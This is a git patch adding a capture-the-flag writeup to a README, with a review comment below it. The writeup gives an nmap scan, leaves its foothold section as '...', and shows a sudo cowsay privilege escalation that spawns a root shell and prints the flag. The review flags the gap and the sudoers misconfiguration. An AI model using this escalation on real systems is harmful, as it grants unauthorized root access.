From dc7b75ef4bceed2b5cc4f72b062be9ae2c909582 Mon Sep 17 00:00:00 2001 From: david Date: Wed, 17 Sep 2025 13:36:06 +0200 Subject: [PATCH] * added temp writeup --- README.md | 42 ++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 40 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 597d197..5356867 100644 --- a/README.md +++ b/README.md @@ -7,8 +7,46 @@ ## Writeup - - +### Enum + +Scan the IP using nmap for open ports + +``` +nmap -p- ip +``` + +The port 22 and 31337 are open. + +We find that there is a web service on port 31337. + +### Foothold + +... + +### Privesc + +We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password. + +``` +User l33t may run the following commands on srv1prod: + (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l +``` + +Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration. + +[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/) + +``` +TF=$(mktemp) +echo 'exec "/bin/sh";' >$TF +sudo cowsay -f $TF x +# id +uid=0(root) gid=0(root) groups=0(root) +# cat /root/root.txt +epita{th3-sup3r-c0ws4y} +``` + +Solved !
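Review bot: The `### Foothold` section in the README.md hunk is committed as a bare `...`, so the writeup jumps from "there is a web service on port 31337" straight to `User l33t may run the following commands on srv1prod` with no account of how access as `l33t` was obtained. Either fill the section in or mark it explicitly as TODO, so readers do not take the writeup as complete. In `### Privesc`, "allowed tu run" should be "allowed to run", and the `sudo -l` command that produced the quoted output should be shown before it. The sudoers entry allows the absolute path `/usr/games/cowsay`, while the command block runs `sudo cowsay -f $TF x`, which only matches if `cowsay` resolves to that path. Use the full path in the block and quote `"$TF"`. In `### Enum`, `nmap -p- ip` uses a bare `ip` placeholder, which would read more clearly as `<target-ip>`. A closing sentence naming the root cause would also help: the file passed with `-f` is executed by cowsay, so the NOPASSWD entry for it amounts to unrestricted root and should be removed from sudoers.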